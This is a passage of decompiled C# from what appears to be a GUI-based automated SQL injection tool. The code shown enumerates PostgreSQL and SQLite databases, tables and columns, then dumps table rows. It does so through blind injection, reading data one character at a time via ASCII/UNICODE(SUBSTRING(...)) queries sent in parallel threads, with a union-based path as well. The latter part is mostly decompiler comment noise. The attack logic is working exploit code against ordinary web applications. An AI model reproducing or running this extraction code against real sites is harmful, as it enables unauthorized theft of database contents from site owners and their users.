				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					return "";
				}
				int intValue = GetIntValue(SelectExpression + "%20length(" + ItemName + ")%20" + FromExpression, MaxLength, 0);
				mainfrm.DisplayLogList("Got Length: " + intValue);
				if (intValue < 1)
				{
					return "";
				}
				for (int i = 0; i < intValue; i++)
				{
					int intValue2 = GetIntValue(SelectExpression + "%20ASCII(SUBSTRING(" + ItemName + "," + (i + 1) + ",1))%20" + FromExpression, MaxChar, 0);
					char c = (char)intValue2;
					text = ((c <= '\u007f') ? (text + c) : (text + (char)GetIntValue(SelectExpression + "%20UNICODE(SUBSTRING(" + ItemName + "," + (i + 1) + ",1))%20" + FromExpression, 65535, 128)));
					mainfrm.DisplayLogList("Got " + text.Length + "/" + intValue + " :  " + text);
				}
				return text;
			}
			catch
			{
				return text;
			}
		}

		private void ExecPostgreSQLGetDB()
		{
			mainfrm.DisplayLogList("Getting DB ...");
			string itemByPostgreSQL = GetItemByPostgreSQL("select", "current_database()", "", 255, 128);
			if (!string.IsNullOrEmpty(itemByPostgreSQL))
			{
				AddDB2TreeView(itemByPostgreSQL);
			}
		}

		private void PostgreSQLGetDBDoWork(object data)
		{
			try
			{
				int num = (int)data;
				WebSite.DebugLog("Getting DB id: " + num);
				string itemByPostgreSQL = GetItemByPostgreSQL("select", "datname", " from pg_database where datistemplate=false limit 1 offset " + num, 255, 32);
				AddDB2TreeView(itemByPostgreSQL);
			}
			catch
			{
			}
		}

		private void ExecPostgreSQLGetTable(object data)
		{
			mainfrm.DisplayLogList("Getting Tables ...");
			GetTreeViewDBCount("");
			int num = GetIntValue("select count(relname) from pg_stat_user_tables", 256, 0);
			mainfrm.DisplayLogList("Got Table Num: " + num);
			if (num < 0)
			{
				num = 256;
			}
			for (int i = 0; i < num; i++)
			{
				string state = i.ToString();
				ThreadPool.QueueUserWorkItem(new WaitCallback(PostgreSQLGetTableDoWork), state);
			}
		}

		private void PostgreSQLGetTableDoWork(object data)
		{
			try
			{
				string str = (string)data;
				string itemByPostgreSQL = GetItemByPostgreSQL("select", "relname", " from pg_stat_user_tables limit 1 offset " + str, 255, 32);
				AddTable2TreeView("0^" + itemByPostgreSQL);
			}
			catch
			{
			}
		}

		private void ExecPostgreSQLGetColumn(object data)
		{
			_ = DateTime.Now;
			string text = "";
			int treeViewDBCount = GetTreeViewDBCount("");
			for (int i = 0; i < treeViewDBCount; i++)
			{
				if (!TreeViewDBChecked(i.ToString()))
				{
					continue;
				}
				GetTreeViewDBText(i.ToString());
				int treeViewDBCount2 = GetTreeViewDBCount(i.ToString());
				for (int j = 0; j < treeViewDBCount2; j++)
				{
					if (TreeViewDBChecked(i + "^" + j))
					{
						mainfrm.DisplayLogList("Getting Columns ...");
						string text2 = "";
						text = GetTreeViewDBText(i + "^" + j);
						int num = GetIntValue("select count(COLUMN_NAME) from information_schema.columns where table_name=" + mainfrm.CurrentSite.EscapeSingleQuotes(text, DBType.PostgreSQL), 128, 0);
						mainfrm.DisplayLogList("Got Column Num: " + num);
						if (num < 0)
						{
							num = 128;
						}
						for (int k = 0; k < num; k++)
						{
							text2 = i + "^" + j + "^" + k + "^" + text;
							ThreadPool.QueueUserWorkItem(new WaitCallback(PostgreSQLGetColumnDoWork), text2);
						}
						break;
					}
				}
			}
		}

		private void PostgreSQLGetColumnDoWork(object data)
		{
			try
			{
				string text = (string)data;
				string[] array = text.Split(new char[1]
				{
					'^'
				});
				string text2 = array[0];
				string text3 = array[1];
				string text4 = array[2];
				string itemName = array[3];
				string itemByPostgreSQL = GetItemByPostgreSQL("select ", "COLUMN_NAME", "from information_schema.columns where table_name=" + mainfrm.CurrentSite.EscapeSingleQuotes(itemName, DBType.PostgreSQL) + " limit 1 offset " + text4.ToString(), 255, 32);
				AddColumn2TreeView(text2 + "^" + text3 + "^" + itemByPostgreSQL);
			}
			catch
			{
			}
		}

		private void ExecPostgreSQLGetData(int RowsBegin, int RowsEnd)
		{
			//IL_0034: Unknown result type (might be due to invalid IL or missing references)
			//IL_003a: Expected O, but got Unknown
			//IL_0065: Unknown result type (might be due to invalid IL or missing references)
			//IL_006b: Expected O, but got Unknown
			//IL_0099: Unknown result type (might be due to invalid IL or missing references)
			//IL_00a0: Expected O, but got Unknown
			//IL_012f: Unknown result type (might be due to invalid IL or missing references)
			//IL_016f: Unknown result type (might be due to invalid IL or missing references)
			mainfrm.DisplayLogList("Getting Data ...");
			string text = "";
			foreach (TreeNode node in treeViewDB.get_Nodes())
			{
				TreeNode val = node;
				if (!val.get_Checked())
				{
					continue;
				}
				val.get_Text();
				foreach (TreeNode node2 in val.get_Nodes())
				{
					TreeNode val2 = node2;
					if (!val2.get_Checked())
					{
						continue;
					}
					text = val2.get_Text();
					string text2 = "";
					foreach (TreeNode node3 in val2.get_Nodes())
					{
						TreeNode val3 = node3;
						if (val3.get_Checked())
						{
							if (!string.IsNullOrEmpty(text2))
							{
								text2 += "||chr(94)||";
							}
							text2 = text2 + "coalesce(cast (" + val3.get_Text() + " as text),chr(32))";
						}
					}
					int intValue = GetIntValue("select count(1) from " + text, RowsEnd, 0);
					mainfrm.DisplayLogList("Got Rows Num: " + intValue);
					if (intValue == 0)
					{
						MessageBox.Show("No Records Found!");
						break;
					}
					if (intValue > 0 && intValue < RowsEnd)
					{
						RowsEnd = intValue;
						((ToolStripItem)txtRowsEnd).set_Text(intValue.ToString());
					}
					if (RowsBegin > RowsEnd)
					{
						MessageBox.Show("* Exceed Records Range!\r\n* The Rows Num=" + intValue);
						break;
					}
					for (int i = RowsBegin - 1; i < RowsEnd; i++)
					{
						string state = text2 + "^" + text + "^" + i;
						ThreadPool.QueueUserWorkItem(new WaitCallback(PostgreSQLGetDataDoWork), state);
					}
					break;
				}
				break;
			}
		}

		private void PostgreSQLGetDataDoWork(object data)
		{
			try
			{
				string[] array = ((string)data).Split(new char[1]
				{
					'^'
				});
				string itemName = array[0];
				string str = array[1];
				string str2 = array[2];
				string itemByPostgreSQL = GetItemByPostgreSQL("select", itemName, " from " + str + " limit 1 offset " + str2, 255, 1024);
				AddItem2ListViewData(itemByPostgreSQL);
			}
			catch
			{
			}
		}

		private string GetItemBySQLite(string SelectExpression, string ItemName, string FromExpression, int MaxChar, int MaxLength)
		{
			string text = "";
			try
			{
				if (WebSite.CurrentStatus == TaskStatus.Stop)
				{
					return "";
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
				{
					GetInjectMethod(URL);
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					text = GetItemByFieldEcho(SelectExpression, ItemName, FromExpression, NeedTempTable: false);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					return "";
				}
				int intValue = GetIntValue(SelectExpression + "%20length(" + ItemName + ")%20" + FromExpression, MaxLength, 0);
				mainfrm.DisplayLogList("Got Length: " + intValue);
				if (intValue < 1)
				{
					return "";
				}
				for (int i = 0; i < intValue; i++)
				{
					int intValue2 = GetIntValue(SelectExpression + "%20unicode(substr(" + ItemName + "," + (i + 1) + ",1))%20" + FromExpression, MaxChar, 0);
					char c = (char)intValue2;
					text = ((c <= '\u007f') ? (text + c) : (text + (char)GetIntValue(SelectExpression + "%20unicode(substr(" + ItemName + "," + (i + 1) + ",1))%20" + FromExpression, 65535, 128)));
					mainfrm.DisplayLogList("Got " + text.Length + "/" + intValue + " :  " + text);
				}
				return text;
			}
			catch
			{
				return text;
			}
		}

		private void ExecSQLiteCheck(object data)
		{
			for (int i = 0; i < listViewEnv.get_Items().get_Count(); i++)
			{
				if (!IsListViewEnvCheckedAt(i))
				{
					continue;
				}
				string text = ReadListViewInfoItems(i);
				if (text.Equals("Version"))
				{
					string itemBySQLite = GetItemBySQLite("select", "sqlite_version()", "", 126, 64);
					AddSubItem2ListViewInfo(i + "^" + itemBySQLite);
				}
				else if (text.Equals("Server"))
				{
					if (string.IsNullOrEmpty(Server))
					{
						Server = GetServer(URL);
					}
					if (string.IsNullOrEmpty(Server))
					{
						Server = "NULL";
					}
					AddSubItem2ListViewInfo(i + "^" + Server);
				}
			}
		}

		private void ExecSQLiteGetTable(object data)
		{
			mainfrm.DisplayLogList("Getting Tables ...");
			int num = GetIntValue("select count(name) from sqlite_master where type=char(116,97,98,108,101)", 256, 0);
			mainfrm.DisplayLogList("Got Table Num: " + num);
			if (num < 0)
			{
				num = 256;
			}
			for (int i = 0; i < num; i++)
			{
				string state = i.ToString();
				ThreadPool.QueueUserWorkItem(new WaitCallback(SQLiteGetTableDoWork), state);
			}
		}

		private void SQLiteGetTableDoWork(object data)
		{
			try
			{
				string str = (string)data;
				string itemBySQLite = GetItemBySQLite("select", "name", " from sqlite_master where type=char(116,97,98,108,101) limit " + str + ",1", 255, 32);
				AddTable2TreeView("0^" + itemBySQLite);
			}
			catch
			{
			}
		}

		private void ExecSQLiteGetColumn(object data)
		{
			//IL_00fe: Unknown result type (might be due to invalid IL or missing references)
			//IL_0105: Expected O, but got Unknown
			string text = "";
			int treeViewDBCount = GetTreeViewDBCount("");
			for (int i = 0; i < treeViewDBCount; i++)
			{
				if (!TreeViewDBChecked(i.ToString()))
				{
					continue;
				}
				int treeViewDBCount2 = GetTreeViewDBCount(i.ToString());
				for (int j = 0; j < treeViewDBCount2; j++)
				{
					if (!TreeViewDBChecked(i + "^" + j))
					{
						continue;
					}
					mainfrm.DisplayLogList("Getting Columns ...");
					text = GetTreeViewDBText(i + "^" + j);
					int num = j;
					string itemBySQLite = GetItemBySQLite("select", "sql", " from sqlite_master where tbl_name=" + mainfrm.CurrentSite.EscapeSingleQuotes(text, DBType.SQLite), 126, 1024);
					if (!Regex.IsMatch(itemBySQLite, "CREATE\\sTABLE\\s`", (RegexOptions)1))
					{
						break;
					}
					MatchCollection val = Regex.Matches(itemBySQLite, "(?<=\\x09`)[^`]+(?=`\\s)");
					foreach (Match item in val)
					{
						Match val2 = item;
						string value = ((Capture)val2).get_Value();
						mainfrm.DisplayLogList("Got Column: " + value);
						AddColumn2TreeView("0^" + num + "^" + value);
					}
					break;
				}
			}
		}

		private void ExecSQLiteGetData(int RowsBegin, int RowsEnd)
		{
			//IL_0034: Unknown result type (might be due to invalid IL or missing references)
			//IL_003a: Expected O, but got Unknown
			//IL_005e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0064: Expected O, but got Unknown
			//IL_0092: Unknown result type (might be due to invalid IL or missing references)
			//IL_0099: Expected O, but got Unknown
			//IL_0128: Unknown result type (might be due to invalid IL or missing references)
			//IL_0168: Unknown result type (might be due to invalid IL or missing references)
			mainfrm.DisplayLogList("Getting Data ...");
			string text = "";
			foreach (TreeNode node in treeViewDB.get_Nodes())
			{
				TreeNode val = node;
				if (!val.get_Checked())
				{
					continue;
				}
				foreach (TreeNode node2 in val.get_Nodes())
				{
					TreeNode val2 = node2;
					if (!val2.get_Checked())
					{
						continue;
					}
					text = val2.get_Text();
					string text2 = "";
					foreach (TreeNode node3 in val2.get_Nodes())
					{
						TreeNode val3 = node3;
						if (val3.get_Checked())
						{
							if (!string.IsNullOrEmpty(text2))
							{
								text2 += "||char(94)||";
							}
							text2 = text2 + "coalesce(" + val3.get_Text() + ",char(32))";
						}
					}
					int intValue = GetIntValue("select count(1) from " + text, RowsEnd, 0);
					mainfrm.DisplayLogList("Got Rows Num: " + intValue);
					if (intValue == 0)
					{
						MessageBox.Show("No Records Found!");
						break;
					}
					if (intValue > 0 && intValue < RowsEnd)
					{
						RowsEnd = intValue;
						((ToolStripItem)txtRowsEnd).set_Text(intValue.ToString());
					}
					if (RowsBegin > RowsEnd)
					{
						MessageBox.Show("* Exceed Records Range!\r\n* The Rows Num=" + intValue);
						break;
					}
					for (int i = RowsBegin - 1; i < RowsEnd; i++)
					{
						string state = text2 + "^" + text + "^" + i;
						ThreadPool.QueueUserWorkItem(new WaitCallback(SQLiteGetDataDoWork), state);
					}
					break;
				}
				break;
			}
		}

		private void SQLiteGetDataDoWork(object data)
		{
			try
			{
				string[] array = ((string)data).Split(new char[1]
				{
					'^'
				});
				string itemName = array[0];
				string str = array[1];
				string str2 = array[2];
				string itemBySQLite = GetItemBySQLite("select", itemName, " from " + str + " limit 1 offset " + str2, 255, 1024);
				AddItem2ListViewData(itemBySQLite);
			}
			catch
			{
			}
		}

		protected override void Dispose(bool disposing)
		{
			if (disposing && components != null)
			{
				((IDisposable)components).Dispose();
			}
			((Form)this).Dispose(disposing);
		}

		private void InitializeComponent()
		{
			//IL_0001: Unknown result type (might be due to invalid IL or missing references)
			//IL_000b: Expected O, but got Unknown
			//IL_0015: Unknown result type (might be due to invalid IL or missing references)
			//IL_001b: Expected O, but got Unknown
			//IL_001c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0026: Expected O, but got Unknown
			//IL_0027: Unknown result type (might be due to invalid IL or missing references)
			//IL_0031: Expected O, but got Unknown
			//IL_0032: Unknown result type (might be due to invalid IL or missing references)
			//IL_003c: Expected O, but got Unknown
			//IL_003d: Unknown result type (might be due to invalid IL or missing references)
			//IL_0047: Expected O, but got Unknown
			//IL_0048: Unknown result type (might be due to invalid IL or missing references)
			//IL_0052: Expected O, but got Unknown
			//IL_0053: Unknown result type (might be due to invalid IL or missing references)
			//IL_005d: Expected O, but got Unknown
			//IL_005e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0068: Expected O, but got Unknown
			//IL_0069: Unknown result type (might be due to invalid IL or missing references)
			//IL_0073: Expected O, but got Unknown
			//IL_0074: Unknown result type (might be due to invalid IL or missing references)
			//IL_007e: Expected O, but got Unknown
			//IL_007f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0089: Expected O, but got Unknown
			//IL_008a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0094: Expected O, but got Unknown
			//IL_0095: Unknown result type (might be due to invalid IL or missing references)
			//IL_009f: Expected O, but got Unknown
			//IL_00a0: Unknown result type (might be due to invalid IL or missing references)
			//IL_00aa: Expected O, but got Unknown
			//IL_00b1: Unknown result type (might be due to invalid IL or missing references)
			//IL_00bb: Expected O, but got Unknown
			//IL_00bc: Unknown result type (might be due to invalid IL or missing references)
			//IL_00c6: Expected O, but got Unknown
			//IL_00c7: Unknown result type (might be due to invalid IL or missing references)
			//IL_00d1: Expected O, but got Unknown
			//IL_00d2: Unknown result type (might be due to invalid IL or missing references)
			//IL_00dc: Expected O, but got Unknown
			//IL_00dd: Unknown result type (might be due to invalid IL or missing references)
			//IL_00e7: Expected O, but got Unknown
			//IL_00e8: Unknown result type (might be due to invalid IL or missing references)
			//IL_00f2: Expected O, but got Unknown
			//IL_00f3: Unknown result type (might be due to invalid IL or missing references)
			//IL_00fd: Expected O, but got Unknown
			//IL_00fe: Unknown result type (might be due to invalid IL or missing references)
			//IL_0108: Expected O, but got Unknown
			//IL_0109: Unknown result type (might be due to invalid IL or missing references)
			//IL_0113: Expected O, but got Unknown
			//IL_0114: Unknown result type (might be due to invalid IL or missing references)
			//IL_011e: Expected O, but got Unknown
			//IL_011f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0129: Expected O, but got Unknown
			//IL_012a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0134: Expected O, but got Unknown
			//IL_0135: Unknown result type (might be due to invalid IL or missing references)
			//IL_013f: Expected O, but got Unknown
			//IL_0140: Unknown result type (might be due to invalid IL or missing references)
			//IL_014a: Expected O, but got Unknown
			//IL_014b: Unknown result type (might be due to invalid IL or missing references)
			//IL_0155: Expected O, but got Unknown
			//IL_0156: Unknown result type (might be due to invalid IL or missing references)
			//IL_0160: Expected O, but got Unknown
			//IL_0161: Unknown result type (might be due to invalid IL or missing references)
			//IL_016b: Expected O, but got Unknown
			//IL_016c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0176: Expected O, but got Unknown
			//IL_0177: Unknown result type (might be due to invalid IL or missing references)
			//IL_0181: Expected O, but got Unknown
			//IL_0182: Unknown result type (might be due to invalid IL or missing references)
			//IL_018c: Expected O, but got Unknown
			//IL_018d: Unknown result type (might be due to invalid IL or missing references)
			//IL_0197: Expected O, but got Unknown
			//IL_0198: Unknown result type (might be due to invalid IL or missing references)
			//IL_01a2: Expected O, but got Unknown
			//IL_01a3: Unknown result type (might be due to invalid IL or missing references)
			//IL_01ad: Expected O, but got Unknown
			//IL_01ae: Unknown result type (might be due to invalid IL or missing references)
			//IL_01b8: Expected O, but got Unknown
			//IL_01b9: Unknown result type (might be due to invalid IL or missing references)
			//IL_01c3: Expected O, but got Unknown
			//IL_01c4: Unknown result type (might be due to invalid IL or missing references)
			//IL_01ce: Expected O, but got Unknown
			//IL_01cf: Unknown result type (might be due to invalid IL or missing references)
			//IL_01d9: Expected O, but got Unknown
			//IL_01da: Unknown result type (might be due to invalid IL or missing references)
			//IL_01e4: Expected O, but got Unknown
			//IL_01e5: Unknown result type (might be due to invalid IL or missing references)
			//IL_01ef: Expected O, but got Unknown
			//IL_01f0: Unknown result type (might be due to invalid IL or missing references)
			//IL_01fa: Expected O, but got Unknown
			//IL_01fb: Unknown result type (might be due to invalid IL or missing references)
			//IL_0205: Expected O, but got Unknown
			//IL_0206: Unknown result type (might be due to invalid IL or missing references)
			//IL_0210: Expected O, but got Unknown
			//IL_0211: Unknown result type (might be due to invalid IL or missing references)
			//IL_021b: Expected O, but got Unknown
			//IL_021c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0226: Expected O, but got Unknown
			//IL_0227: Unknown result type (might be due to invalid IL or missing references)
			//IL_0231: Expected O, but got Unknown
			//IL_0232: Unknown result type (might be due to invalid IL or missing references)
			//IL_023c: Expected O, but got Unknown
			//IL_023d: Unknown result type (might be due to invalid IL or missing references)
			//IL_0247: Expected O, but got Unknown
			//IL_0248: Unknown result type (might be due to invalid IL or missing references)
			//IL_0252: Expected O, but got Unknown
			//IL_0253: Unknown result type (might be due to invalid IL or missing references)
			//IL_025d: Expected O, but got Unknown
			//IL_025e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0268: Expected O, but got Unknown
			//IL_0269: Unknown result type (might be due to invalid IL or missing references)
			//IL_0273: Expected O, but got Unknown
			//IL_0274: Unknown result type (might be due to invalid IL or missing references)
			//IL_027e: Expected O, but got Unknown
			//IL_027f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0289: Expected O, but got Unknown
			//IL_028a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0294: Expected O, but got Unknown
			//IL_0295: Unknown result type (might be due to invalid IL or missing references)
			//IL_029f: Expected O, but got Unknown
			//IL_02a0: Unknown result type (might be due to invalid IL or missing references)
			//IL_02aa: Expected O, but got Unknown
			//IL_02ab: Unknown result type (might be due to invalid IL or missing references)
			//IL_02b5: Expected O, but got Unknown
			//IL_02b6: Unknown result type (might be due to invalid IL or missing references)
			//IL_02c0: Expected O, but got Unknown
			//IL_02c1: Unknown result type (might be due to invalid IL or missing references)
			//IL_02cb: Expected O, but got Unknown
			//IL_02cc: Unknown result type (might be due to invalid IL or missing references)
			//IL_02d6: Expected O, but got Unknown
			//IL_02d7: Unknown result type (might be due to invalid IL or missing references)
			//IL_02e1: Expected O, but got Unknown
			//IL_02e2: Unknown result type (might be due to invalid IL or missing references)
			//IL_02ec: Expected O, but got Unknown
			//IL_02ed: Unknown result type (might be due to invalid IL or missing references)
			//IL_02f7: Expected O, but got Unknown
			//IL_02f8: Unknown result type (might be due to invalid IL or missing references)
			//IL_0302: Expected O, but got Unknown
			//IL_0303: Unknown result type (might be due to invalid IL or missing references)
			//IL_030d: Expected O, but got Unknown
			//IL_030e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0318: Expected O, but got Unknown
			//IL_0319: Unknown result type (might be due to invalid IL or missing references)
			//IL_0323: Expected O, but got Unknown
			//IL_0324: Unknown result type (might be due to invalid IL or missing references)
			//IL_032e: Expected O, but got Unknown
			//IL_032f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0339: Expected O, but got Unknown
			//IL_033a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0344: Expected O, but got Unknown
			//IL_0345: Unknown result type (might be due to invalid IL or missing references)
			//IL_034f: Expected O, but got Unknown
			//IL_0350: Unknown result type (might be due to invalid IL or missing references)
			//IL_035a: Expected O, but got Unknown
			//IL_035b: Unknown result type (might be due to invalid IL or missing references)
			//IL_0365: Expected O, but got Unknown
			//IL_0366: Unknown result type (might be due to invalid IL or missing references)
			//IL_0370: Expected O, but got Unknown
			//IL_0371: Unknown result type (might be due to invalid IL or missing references)
			//IL_037b: Expected O, but got Unknown
			//IL_037c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0386: Expected O, but got Unknown
			//IL_0387: Unknown result type (might be due to invalid IL or missing references)
			//IL_0391: Expected O, but got Unknown
			//IL_0392: Unknown result type (might be due to invalid IL or missing references)
			//IL_039c: Expected O, but got Unknown
			//IL_039d: Unknown result type (might be due to invalid IL or missing references)
			//IL_03a7: Expected O, but got Unknown
			//IL_03a8: Unknown result type (might be due to invalid IL or missing references)
			//IL_03b2: Expected O, but got Unknown
			//IL_03b3: Unknown result type (might be due to invalid IL or missing references)
			//IL_03bd: Expected O, but got Unknown
			//IL_03be: Unknown result type (might be due to invalid IL or missing references)
			//IL_03c8: Expected O, but got Unknown
			//IL_03c9: Unknown result type (might be due to invalid IL or missing references)
			//IL_03d3: Expected O, but got Unknown
			//IL_03d4: Unknown result type (might be due to invalid IL or missing references)
			//IL_03de: Expected O, but got Unknown
			//IL_03df: Unknown result type (might be due to invalid IL or missing references)
			//IL_03e9: Expected O, but got Unknown
			//IL_03ea: Unknown result type (might be due to invalid IL or missing references)
			//IL_03f4: Expected O, but got Unknown
			//IL_03f5: Unknown result type (might be due to invalid IL or missing references)
			//IL_03ff: Expected O, but got Unknown
			//IL_0400: Unknown result type (might be due to invalid IL or missing references)
			//IL_040a: Expected O, but got Unknown
			//IL_040b: Unknown result type (might be due to invalid IL or missing references)
			//IL_0415: Expected O, but got Unknown
			//IL_0416: Unknown result type (might be due to invalid IL or missing references)
			//IL_0420: Expected O, but got Unknown
			//IL_0421: Unknown result type (might be due to invalid IL or missing references)
			//IL_042b: Expected O, but got Unknown
			//IL_042c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0436: Expected O, but got Unknown
			//IL_0437: Unknown result type (might be due to invalid IL or missing references)
			//IL_0441: Expected O, but got Unknown
			//IL_0442: Unknown result type (might be due to invalid IL or missing references)
			//IL_044c: Expected O, but got Unknown
			//IL_044d: Unknown result type (might be due to invalid IL or missing references)
			//IL_0457: Expected O, but got Unknown
			//IL_0458: Unknown result type (might be due to invalid IL or missing references)
			//IL_0462: Expected O, but got Unknown
			//IL_0463: Unknown result type (might be due to invalid IL or missing references)
			//IL_046d: Expected O, but got Unknown
			//IL_046e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0478: Expected O, but got Unknown
			//IL_0479: Unknown result type (might be due to invalid IL or missing references)
			//IL_0483: Expected O, but got Unknown
			//IL_0484: Unknown result type (might be due to invalid IL or missing references)
			//IL_048e: Expected O, but got Unknown
			//IL_048f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0499: Expected O, but got Unknown
			//IL_049a: Unknown result type (might be due to invalid IL or missing references)
			//IL_04a4: Expected O, but got Unknown
			//IL_04a5: Unknown result type (might be due to invalid IL or missing references)
			//IL_04af: Expected O, but got Unknown
			//IL_04b0: Unknown result type (might be due to invalid IL or missing references)
			//IL_04ba: Expected O, but got Unknown
			//IL_04bb: Unknown result type (might be due to invalid IL or missing references)
			//IL_04c5: Expected O, but got Unknown
			//IL_04c6: Unknown result type (might be due to invalid IL or missing references)
			//IL_04d0: Expected O, but got Unknown
			//IL_04d1: Unknown result type (might be due to invalid IL or missing references)
			//IL_04db: Expected O, but got Unknown
			//IL_04dc: Unknown result type (might be due to invalid IL or missing references)
			//IL_04e6: Expected O, but got Unknown
			//IL_04e7: Unknown result type (might be due to invalid IL or missing references)
			//IL_04f1: Expected O, but got Unknown
			//IL_04f2: Unknown result type (might be due to invalid IL or missing references)
			//IL_04fc: Expected O, but got Unknown
			//IL_04fd: Unknown result type (might be due to invalid IL or missing references)
			//IL_0507: Expected O, but got Unknown
			//IL_0508: Unknown result type (might be due to invalid IL or missing references)
			//IL_0512: Expected O, but got Unknown
			//IL_0513: Unknown result type (might be due to invalid IL or missing references)
			//IL_051d: Expected O, but got Unknown
			//IL_051e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0528: Expected O, but got Unknown
			//IL_0529: Unknown result type (might be due to invalid IL or missing references)
			//IL_0533: Expected O, but got Unknown
			//IL_0534: Unknown result type (might be due to invalid IL or missing references)
			//IL_053e: Expected O, but got Unknown
			//IL_06df: Unknown result type (might be due to invalid IL or missing references)
			//IL_0715: Unknown result type (might be due to invalid IL or missing references)
			//IL_0770: Unknown result type (might be due to invalid IL or missing references)
			//IL_0791: Unknown result type (might be due to invalid IL or missing references)
			//IL_07ab: Unknown result type (might be due to invalid IL or missing references)
			//IL_0833: Unknown result type (might be due to invalid IL or missing references)
			//IL_0869: Unknown result type (might be due to invalid IL or missing references)
			//IL_08a5: Unknown result type (might be due to invalid IL or missing references)
			//IL_08af: Expected O, but got Unknown
			//IL_08f5: Unknown result type (might be due to invalid IL or missing references)
			//IL_095f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0986: Unknown result type (might be due to invalid IL or missing references)
			//IL_09c6: Unknown result type (might be due to invalid IL or missing references)
			//IL_09ed: Unknown result type (might be due to invalid IL or missing references)
			//IL_09f7: Expected O, but got Unknown
			//IL_09fd: Unknown result type (might be due to invalid IL or missing references)
			//IL_0a24: Unknown result type (might be due to invalid IL or missing references)
			//IL_0a6e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0a95: Unknown result type (might be due to invalid IL or missing references)
			//IL_0a9f: Expected O, but got Unknown
			//IL_0aa5: Unknown result type (might be due to invalid IL or missing references)
			//IL_0ac9: Unknown result type (might be due to invalid IL or missing references)
			//IL_0b29: Unknown result type (might be due to invalid IL or missing references)
			//IL_0b4a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0b64: Unknown result type (might be due to invalid IL or missing references)
			//IL_0baa: Unknown result type (might be due to invalid IL or missing references)
			//IL_0c40: Unknown result type (might be due to invalid IL or missing references)
			//IL_0c91: Unknown result type (might be due to invalid IL or missing references)
			//IL_0c9b: Expected O, but got Unknown
			//IL_0ce5: Unknown result type (might be due to invalid IL or missing references)
			//IL_0cf9: Unknown result type (might be due to invalid IL or missing references)
			//IL_0d2f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0d52: Unknown result type (might be due to invalid IL or missing references)
			//IL_0d5c: Expected O, but got Unknown
			//IL_0d69: Unknown result type (might be due to invalid IL or missing references)
			//IL_0d73: Expected O, but got Unknown
			//IL_0d80: Unknown result type (might be due to invalid IL or missing references)
			//IL_0d8a: Expected O, but got Unknown
			//IL_0d97: Unknown result type (might be due to invalid IL or missing references)
			//IL_0da1: Expected O, but got Unknown
			//IL_0db2: Unknown result type (might be due to invalid IL or missing references)
			//IL_0dbc: Expected O, but got Unknown
			//IL_0dc2: Unknown result type (might be due to invalid IL or missing references)
			//IL_0fc3: Unknown result type (might be due to invalid IL or missing references)
			//IL_1079: Unknown result type (might be due to invalid IL or missing references)
			//IL_10a0: Unknown result type (might be due to invalid IL or missing references)
			//IL_111b: Unknown result type (might be due to invalid IL or missing references)
			//IL_113e: Unknown result type (might be due to invalid IL or missing references)
			//IL_1165: Unknown result type (might be due to invalid IL or missing references)
			//IL_116f: Expected O, but got Unknown
			//IL_1175: Unknown result type (might be due to invalid IL or missing references)
			//IL_1199: Unknown result type (might be due to invalid IL or missing references)
			//IL_11e3: Unknown result type (might be due to invalid IL or missing references)
			//IL_120a: Unknown result type (might be due to invalid IL or missing references)
			//IL_1214: Expected O, but got Unknown
			//IL_121a: Unknown result type (might be due to invalid IL or missing references)
			//IL_123e: Unknown result type (might be due to invalid IL or missing references)
			//IL_1288: Unknown result type (might be due to invalid IL or missing references)
			//IL_12af: Unknown result type (might be due to invalid IL or missing references)
			//IL_12b9: Expected O, but got Unknown
			//IL_12bf: Unknown result type (might be due to invalid IL or missing references)
			//IL_12e3: Unknown result type (might be due to invalid IL or missing references)
			//IL_132d: Unknown result type (might be due to invalid IL or missing references)
			//IL_1354: Unknown result type (might be due to invalid IL or missing references)
			//IL_135e: Expected O, but got Unknown
			//IL_1364: Unknown result type (might be due to invalid IL or missing references)
			//IL_1388: Unknown result type (might be due to invalid IL or missing references)
			//IL_13d2: Unknown result type (might be due to invalid IL or missing references)
			//IL_13f9: Unknown result type (might be due to invalid IL or missing references)
			//IL_1403: Expected O, but got Unknown
			//IL_1409: Unknown result type (might be due to invalid IL or missing references)
			//IL_142d: Unknown result type (might be due to invalid IL or missing references)
			//IL_1477: Unknown result type (might be due to invalid IL or missing references)
			//IL_14ad: Unknown result type (might be due to invalid IL or missing references)
			//IL_14c1: Unknown result type (might be due to invalid IL or missing references)
			//IL_14eb: Unknown result type (might be due to invalid IL or missing references)
			//IL_1526: Unknown result type (might be due to invalid IL or missing references)
			//IL_1530: Expected O, but got Unknown
			//IL_1536: Unknown result type (might be due to invalid IL or missing references)
			//IL_15d9: Unknown result type (might be due to invalid IL or missing references)
			//IL_1600: Unknown result type (might be due to invalid IL or missing references)
			//IL_1640: Unknown result type (might be due to invalid IL or missing references)
			//IL_1674: Unknown result type (might be due to invalid IL or missing references)
			//IL_16b8: Unknown result type (might be due to invalid IL or missing references)
			//IL_16ec: Unknown result type (might be due to invalid IL or missing references)
